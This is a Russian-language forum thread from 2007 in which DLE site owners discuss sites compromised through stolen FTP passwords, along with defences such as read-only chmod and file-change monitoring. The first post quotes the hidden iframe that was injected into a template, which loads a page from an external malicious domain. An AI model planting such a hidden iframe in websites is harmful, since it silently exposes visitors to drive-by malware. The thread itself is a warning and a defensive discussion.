Danila 8 Опубликовано: 15 мая 2007 Рассказать Опубликовано: 15 мая 2007 Много раз об этом писалось, но хочу предупридить вас еще раз. 29 апреля взломали мой сайт psy-files.ru Ломали по фтп, из Ханты-мансийска, вставили <iframe src="http://www.thenull.info/ms_update.html" width="0" height="0" style="display:none"></iframe> Но, вставили его не в index.php (на аккаунте много доменов), а в файл main.tpl действующего шаблона (еще есть старые шаблоны) между строк </header> и {AJAX} Обычно тупо вставляли в конце index-ого файла, а тут в шаблон, да еще и в самое начало... То есть похоже, что это было сделано целенаправленно против данного двига (люди знали куда вставлять). Так что ставьте запрет на запись на main.tpl (для индекса я это уже сделал) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 15 мая 2007 Рассказать Опубликовано: 15 мая 2007 Ломали по фтп, из Ханты-мансийска, вставили Тупо вставляет бот трояна, а если есть доступ по FTP и вставляет человек, то почему бы это не сделать грамотно в шаблон Цитата Ссылка на сообщение Поделиться на других сайтах
kolyma 2 Опубликовано: 15 мая 2007 Рассказать Опубликовано: 15 мая 2007 Danila, да ни фига, DLE тут не причем, у меня также стыбрили пассы на ftp (или у хостера) и на все сайты повставляли, вне зависимости от CMS, вплоть до статичных html'ов Цитата Ссылка на сообщение Поделиться на других сайтах
Lyubovnick3 1 Опубликовано: 15 мая 2007 Рассказать Опубликовано: 15 мая 2007 Вчера на BiNuRaL шелл нашёл и антифильтр. Обновили до 5.7 Тоже пароли известны были. И так же DLE тут не при чём Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Автор Ломали по фтп, из Ханты-мансийска, вставили Тупо вставляет бот трояна, а если есть доступ по FTP и вставляет человек, то почему бы это не сделать грамотно в шаблон Имеено человек и вставил это грамотно в середину шаблона main.tpl! А не как робот в конец index'ого файла. Я не говорю, что здесь виноват ДЛЕ, я ж сказал, что ломали через FTP. Просто хочу обратить внимание коллег-юзеров ДЛЕ, что делалось это именно человеком и именно в шаблон и тот кто это делал был знаком с двигом ДЛЕ. Просто предупредил. Цитата Ссылка на сообщение Поделиться на других сайтах
Akela 9 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 (изменено) Ломали по фтп, из Ханты-мансийска, вставили Тупо вставляет бот трояна, а если есть доступ по FTP и вставляет человек, то почему бы это не сделать грамотно в шаблон По поводу частых взломов у меня есть простая идея, которая в случае с ботами может сработать. Скрытый текстПри наличии сделанного слепка всех файлов в кроне запускается периодическая проверка, скажем раз в 30 минут. При наличии любого изменения тут же отсылается мейл админу. Если же сайт взломан ручками, то конечно же взломщик и это сможет блокировать, но для этого нужны чуть продвинутые знания в движке. Изменено 16 мая 2007 пользователем Akela Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 По поводу частых взломов у меня есть простая идея, которая в случае с ботами может сработать. а еще лучше не ловить троянов и поговорить с хостером чтобы провели проверку ПО а не просто отмахивались. Это в случае с ботом, уже очень давно выпущено описание это трояна, все антивирусы его знают, что что мешает проверить комп на вирусы и поставить все таки заплатки на Windows и IE, эти дырки давно закрыты. Вот я почему за лицензионное ПО от Microsoft, все дырки закрываются гораздо раньше чем они приобретают массовый характер, а при лицензии поставил обновления на автомат и голова больше не болит. Цитата Ссылка на сообщение Поделиться на других сайтах
Denprofi 0 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 а как вообще понять взломали ли у тя сайт? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 а как вообще понять взломали ли у тя сайт? если заходя а свой сайт у вас начинается грузится какая нибудь хрень, то значит ... либо как правило боты ставят код по шаблону в самое начало файла, тем самым нарушаются стандарты HTML и ваш сайт показывается в неожиданном виде, т.к. CSS уже не работает и т.д. Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Автор а еще лучше не ловить троянов и поговорить с хостером чтобы провели проверку ПО а не просто отмахивались. А хостер тут причем? Если бы была дыра в ПО у хостера, то ломали бы не один-два сайта, а сразу серваками. У меня несколько аккаунтов, только в те вставили iframe на которые я заходил по ФТП с незащищенных (без антивируса) компьютеров. На те аккаунты куда я заходил только с компьютеров с антивирусами, таких проблем в виде вставленных скриптов и ifram'ов нет. Это просто обычный троян. У хостера стоит freebsd, не думаю, что проблема у него. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Если бы была дыра в ПО у хостера, то ломали бы не один-два сайта, а сразу серваками. http://www.kaspersky.ru/news?id=207732424 Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Автор Только freebsd не понимает вирусы написанные под винды, для нее это просто набор символов. По ссылке нигде не сказано, что были заражены сервера со freebsd. Цитата Ссылка на сообщение Поделиться на других сайтах
Slash 0 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Так что ставьте запрет на запись на main.tpl (для индекса я это уже сделал) Запред на запись - это какой CHMOD? Цитата Ссылка на сообщение Поделиться на других сайтах
Kaiser 2 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Slash, Ну по стандарту 644, можно поставить 444, только для четния, тоже самое и для index.php стоит зделать. Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Автор Slash, Ну по стандарту 644, можно поставить 444, только для четния, тоже самое и для index.php стоит зделать. 644 разрешает запись юзеру, если идет соед. по фтп от имени юзера, то запрет 644 не поможет. Нужен 444, но это поможет только от ботов. Любой чел, соед. по фтп от имени владельца файла спокойно сможет поменять 444 на 644 или любой другой. Цитата Ссылка на сообщение Поделиться на других сайтах
Kaiser 2 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Danila, Ну вообще-то меня конкретно спросили про chmod, а не про то, у кого есть пароли или нет, это уже другая тема. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Danila, По вашему хостинг valuehost на Windows стоит, также на linux, Если вы считаете что вирусы есть только для windows то мне очень жаль, но я вас разочарую, для абсолютно любой OS существуют вирусы, вопрос только в том закрыты ли были уязвимости Цитата Ссылка на сообщение Поделиться на других сайтах
kolyma 2 Опубликовано: 16 мая 2007 Рассказать Опубликовано: 16 мая 2007 Чаще всего пассы на ftp, наверное в 90%, тащат с компом пользователей Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.